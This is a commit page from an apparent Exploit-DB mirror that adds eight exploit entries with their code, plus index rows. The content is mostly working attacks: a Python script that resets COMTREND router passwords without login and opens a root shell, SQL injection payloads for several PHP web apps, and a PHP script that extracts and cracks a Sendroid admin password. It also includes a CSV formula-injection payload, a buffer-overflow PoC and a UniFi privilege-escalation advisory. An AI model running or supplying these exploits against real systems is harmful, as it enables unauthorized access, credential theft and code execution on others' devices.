bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-27

Browse source 
8 changes to exploits/shellcodes

GetGo Download Manager 5.3.0.2712 - Buffer Overflow

Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation

COMTREND ADSL Router CT-5367 - Remote Code Execution
Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection
Biometric Shift Employee Management System 3.0 - Local File Disclosure
Sendroid < 6.5.0 - SQL Injection
SilverStripe CMS 3.6.2 - CSV Excel Macro Injection

Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection
This commit is contained in:
Offensive Security 2017-12-27 05:02:31 +00:00
parent 0fcc4af85c
commit b91055c9da
9 changed files with 672 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

124
exploits/hardware/remote/43389.py Executable file
View file

@ -0,0 +1,124 @@
# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type : HardWare
# Risk of use : High
# Type to use : Remote
1. Description
Any user can edit all users password and execute remote code directly without have access
2. Proof of Concept
request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi
<form>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120">Username:</td>
<td><select name='userName' size="1">
<option value="0">
<option value="1">root <!-- admin -->
<option value="2">support <!-- support -->
<option value="3">user <!-- user -->
</select></td>
</tr>
<tr>
<td>Old Password:</td>
<td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>Confirm Password:</td>
<td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
</tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>
3 .exploit
#!/usr/bin/env python
import platform
import requests
import base64
url = "http://192.168.1.1/"
''' first check default gateway '''
r = requests.get(url,allow_redirects=True)
resp = r.content
'''Check resp'''
if 'Authorization' not in resp:
exit("[-]Invalid host !! ")
''' Change password '''
again = True
while again:
print "Which User"
print "(root | support | user )"
user = raw_input('user : ').split()[0]
if user not in ("root","support","user"):
exit("[-] No user with this name !! ")
print "[+] Update password ",user
password = raw_input('new password : ').split()[0]
print "[+] Update new password ['",password,"']"
if user == "root":
url +="password.cgi?sysPassword="+password
if user == "support":
url +="password.cgi?sptPassword="+password
if user == "user":
url +="password.cgi?usrPassword="+password
pass_b64 = password.encode('base64').split()[0]
r2 = requests.get(url,allow_redirects=True)
resp2 = r2.content
''' Check update '''
if pass_b64 in resp2:
print "[+] Password for user : ",user," updated!"
print "Happy hacking :D, enjoy"
else:
print "[-] Something Wrong , please check again! "
y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
if 'n'!= y_n and 'y' != y_n:
exit('bad input :(')
if y_n == 'n':
print "Go Go Go :D ,No Time for you Mr.Robot"
shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0]
if shell_yn !='n':
sys = platform.system()
if sys =="Windows":
exit("Sorry only on Linux or Mac Os")
from pwn import *
target = "192.168.1.1"
port = 23
p = remote(target,port)
p.recvuntil("Login:")
p.sendline(user)
p.recvuntil("Password:")
p.sendline(password)
p.sendline("sysinfo ;sh")
p.interactive()
again = False

79
exploits/php/webapps/43349.txt Normal file
View file

@ -0,0 +1,79 @@
# # # # #
# Exploit Title: Cells Blog 3.5 - SQL Injection
# Dork: N/A
# Date: 16.12.2017
# Vendor Homepage: http://www.cells.tw/
# Software Link: http://www.cells.tw/cells/
# Version: 3.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL]
#
# -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1 AND 9841=9841&fmid=7
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1&fmid=7 AND 2056=2056
# 2)
# http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL]
#
# Parameter: fnid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12
#
# 3)
# http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL]
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10 AND 9273=9273
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2 AND 9536=9536&fmid=10
#
# 4)
# http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL]
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1&fmid=2 AND 5699=5699
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1 AND 9899=9899&fmid=2
#
# # # # #

26
exploits/php/webapps/43393.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component JEXTN FAQ Pro 4.0.0 - SQL Injection
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/jextn-faq-pro/
# Version: 4.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17875
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jefaqpro&view=category&id=[SQL]&Itemid=494
#
# 11+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
#
# # # # #

23
exploits/php/webapps/43394.txt Normal file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: https://www.shiftsystems.net/
# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17876
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download local files....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE]
#
# # # # #

204
exploits/php/webapps/43395.php Normal file
View file

@ -0,0 +1,204 @@
# Exploit Title: Sendroid - Bulk SMS Portal, Marketing Script( 5.0.0 - 6.5.0 ) - SQL Injection
# Google Dork: "welcome to * SMS portal"
# Date: 22/12/2017
# Exploit Author: Onwuka Gideon <dongiodmed[@]gmail[.]com>
Contact: http://twitter.com/@gideon_onwuka
# Vendor Homepage: http://ynetinteractive.com/
# Software Buy: https://codecanyon.net/item/sendroid-bulk-sms-portal-marketing-2way-messaging-script-with-mobile-app/14657225
# Version: 5.0.0 - 6.5.0
# Tested on: Mac OS
1. Description
The softaware suffers from SQL Injection:
"/API/index.php?action=compose&username=sender&api_key=sdsd&sender"
2. Script (Automatic takeover)
Attached to mail
4. How to run Script
You must have PHP installed on your system to run the script.
- First, copy the code to a file and save(eg: sendroid_exploit.php)
- Open up your command line and CD into the directory where you saved the file.
- Now, type "$ php -f sendroid_exploit.php url=http://localhost/sms"
Note: The URL should be a direct link to where the software is installed.
3. Proof of Concept
Run the script for example:
php -f sendroid_exploit.php url=http://localhost/sms
<?php
/**
* A script to authomatically get admin password
*
* @author: Onwuka Gideon <dongidomed[@]gmail[.]com>
*
*/
parse_str(implode('&', array_slice($argv, 1)), $_GET);
$queries =[
"sql_get_email" => "/*!12345SELECT*/+email+FROM+users+WHERE+username='admin'",
"sql_get_password0" => "/*!12345SELECT*/+SUBSTRING(password,1,32)+FROM+users+WHERE+username='admin'",
"sql_get_password1" => "/*!12345SELECT*/+SUBSTRING(password,33)+FROM+users+WHERE+username='admin'",
];
$payload = "/API/index.php?action=compose&username=asdasd%27)%20OR%20(SELECT%203321%20FROM(SELECT%20COUNT(*),CONCAT+((<query>),FLOOR(RAND(0)*2))x%20FROM%20/*!INFORMATION_SCHEMA*/.PLUGINS%20GROUP%20BY%20x)a)--%20RPjw&api_key=sdsd&sender";
//
checkCommands();
print_r(getEmailAndPassword($_GET['url'], $payload, $queries));
/**
*
* Checks if minimum expected command is issued
*
* @param: $_GET
* @return; Boolean
**/
function checkCommands(){
//url && shell
$url = $_GET['url'] ?? "";
if( $url == "" ) {
"Please enter a target";
help();
exit(1);
}
}
// Print help message
function help(){
echo "Invalid command " . PHP_EOL;
echo "eg php -f sendroid_exploit.php url=https://localhost/sms" . PHP_EOL;
echo "" . PHP_EOL;
}
// ==
// == Reset password and Get the Password hash
// ==
function getEmailAndPassword($url, $payload, $queries){
//>> Fetch admin email
echo "Fetching admin email....:";
$sql_get_email = $url . str_replace("<query>", $queries['sql_get_email'], $payload);
$email = extractValue(makeRequest($sql_get_email));
echo $email . PHP_EOL.PHP_EOL;
//<< EndFetch admin email
//>> Fetch admin old pass
echo "Fetching admin old password...:";
$sql_old_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_old_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$old_password = extractValue(makeRequest($sql_old_password0), 'password') . extractValue(makeRequest($sql_old_password1), 'password');
echo $old_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin old
// Now we have the old password and admin email
// reset password
echo "Resetting password...:";
$forgot_password = $url . "/administrator/index.php?reset&p";
makeRequest($forgot_password, "POST", ["userEmail" => $email]);
echo " Done!" . PHP_EOL.PHP_EOL;
//>> Fetch admin new password
echo "Getting new password...:";
$sql_new_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_new_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$new_password = extractValue(makeRequest($sql_new_password0), 'password') . extractValue(makeRequest($sql_new_password1), 'password');
echo $new_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin new password
//>> Cracking password
echo "Craking password...:";
$password = crackPassword($new_password);
echo $password . PHP_EOL.PHP_EOL;
//<< Cracking password
// return $sql_get_email;
return ["email" => $email, "password" => $password];
}
//
// POST and GET request
// ==
function makeRequest($url, $method = "GET", $parameter = []){
// Get cURL resource
$curl = curl_init();
// Set some options - we are passing in a useragent too here
if( strtolower($method) == "post" ){
curl_setopt_array($curl, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => $url,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $parameter
]);
}
else{
curl_setopt_array($curl, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => $url,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
]);
}
// Send the request & save response to $resp
$resp = curl_exec($curl);
// Close request to clear up some resources
curl_close($curl);
return $resp;
}
// Extract the real value
function extractValue($payload, $what = "email"){
$patterns = []; $patterns[0] = "/ for key 'group_key'/"; $patterns[1] = "/Duplicate entry /"; $patterns[2] = "/\s\s+/"; $patterns[3] = "/'/";
$replacements = []; $replacement[0] = ""; $replacements[1] = ""; $replacements[2] = ""; $replacements[3] = "";
$result = preg_replace($patterns, $replacements, $payload);
return substr($result, 0, -1);
}
function crackPassword($password){
echo " cracking... please wait... ";
$pwsalt = explode( ":",$password );
for ($i=1; $i < 20000000000000 ; $i++) {
if(md5($i . $pwsalt[1]) == $pwsalt[0] ) {
return $i;
}
}
return "Could not crack password";
}
If you successfully run the script, you'll get the admin password. You can login to the admin portal:
localhost/sms/administrator/
4. Solution:
Update to the latest version

36
exploits/php/webapps/43396.txt Normal file
View file

@ -0,0 +1,36 @@
Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection
Vendor Homepage: https://www.silverstripe.org/
Software Link: https://www.silverstripe.org/download
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: web apps
Platform: PHP
Description:
In the CSV export feature of the SilverStripe CMS, it's possible for the
output to contain macros and scripts, which if imported without
sanitization into software (including Microsoft Excel) may be executed.
Proof of Concept
Steps to Reproduce:
1. Login with normal user's credentials
2. Access the below URL via your browser:
http://localhost/SilverStripe/admin/myprofile
3. Enter the below payload in the "First Name" field and save the profile"
@SUM(1+1)*cmd|' /C calc'!A0
4. Log in with admin's credentials on a different browser
5. Access te security page at the below link:
http://localhost/SilverStripe/admin/security/
6. Click on "Export to CSV" option and open the exported CSV file in any
Spreadsheet application
Solution:
The issue has been fixed in the latest release of SilverStripe which can be
downloaded from here: https://www.silverstripe.org/download
Reference:
https://www.silverstripe.org/download/security-releases/ss-2017-007

57
exploits/windows/dos/43391.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
1. Description
A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.
2. Proof of Concept
def main():
host = "192.168.205.128"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
evilbuffer = "A" * 4105
hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this.
pads = "C"*(6000 - len(evilbuffer + hardCodedEIP))
payload = evilbuffer + hardCodedEIP + pads
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
if __name__ == '__main__':
import socket
from time import sleep
main()
3. Solution:
No solution as of yet.

115
exploits/windows/local/43390.txt Normal file
View file

@ -0,0 +1,115 @@
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Ubiquiti UniFi Video (Windows)
Vendor URL: https://www.ubnt.com
Type: Improper Handling of Insufficient Permissions or Privileges
[CWE-280]
Date found: 2016-05-24
Date published: 2017-12-20
CVSSv3 Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2016-6914
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
UniFi Video 3.7.3 (Windows),
UniFi Video 3.7.0 (Windows),
UniFi Video 3.2.2 (Windows),
older versions may be affected too.
4. INTRODUCTION
===============
UniFi Video is a powerful and flexible, integrated IP video management
surveillance system designed to work with Ubiquitis UniFi Video Camera product
line. UniFi Video has an intuitive, configurable, and featurepacked user
interface with advanced features such as motion detection, autodiscovery,
user-level security, storage management, reporting, and mobile device support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.
However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.
By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.
6. RISK
=======
To successfully exploit this vulnerability, an attacker must already have access
to a system running a vulnerable installation of UniFi video using a
low-privileged user account (i.e. through a password compromise).
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM, which basically means a complete loss of
the system's confidentiality, integrity as well as availability.
7. SOLUTION
===========
Update to v3.8.0
8. REPORT TIMELINE
==================
2016-05-24: Discovery of the vulnerability
2016-05-24: Reported to vendor via HackerOne (#140793)
2016-05-24: Vendor acknowledges the vulnerability
2016-08-22: Request for status update
2016-08-22: Vendor states that there is no update so far
2016-08-23: MITRE assigns CVE-2016-6914
2016-11-08: Request for status update
2016-11-08: Vendor states that there is no update so far
2016-12-08: Request for status update
2016-12-08: Vendor states that project team is working on it
2017-02-23: Request for status update
2017-03-23: No response from vendor
2017-03-23: Request for status update
2017-03-23: Vendor states that fix is scheduled for v3.7.0
2017-05-23: v3.7.0 was released, but vulnerability is still exploitable,
vendor notified again
2017-06-07: Vendor states that fix is actually delayed
2017-08-26: Vendor provides beta versions of 3.7.3 and 3.8.0-beta3, which should
fix the issue
2017-08-31: While v3.7.3 is still vulnerable, the issue was fixed in 3.8.0-beta3
2017-09-18: v3.8.0 released publicly
2017-12-20: Public disclosure
9. REFERENCES
=============
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-6914
https://hackerone.com/reports/140793

8
files_exploits.csv
View file

@ -5432,6 +5432,7 @@ id,file,description,date,author,type,platform,port
43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9233,6 +9234,7 @@ id,file,description,date,author,type,platform,port
41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15867,6 +15869,7 @@ id,file,description,date,author,type,platform,port
43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -37662,6 +37665,10 @@ id,file,description,date,author,type,platform,port
43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,
43379,exploits/windows/webapps/43379.txt,"BEIMS ContractorWeb 5.18.0.0 - SQL Injection",2017-12-20,"Rajwinder Singh",webapps,windows,
43393,exploits/php/webapps/43393.txt,"Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection",2017-12-26,"Ihsan Sencan",webapps,php,
43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
@ -38415,3 +38422,4 @@ id,file,description,date,author,type,platform,port
43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.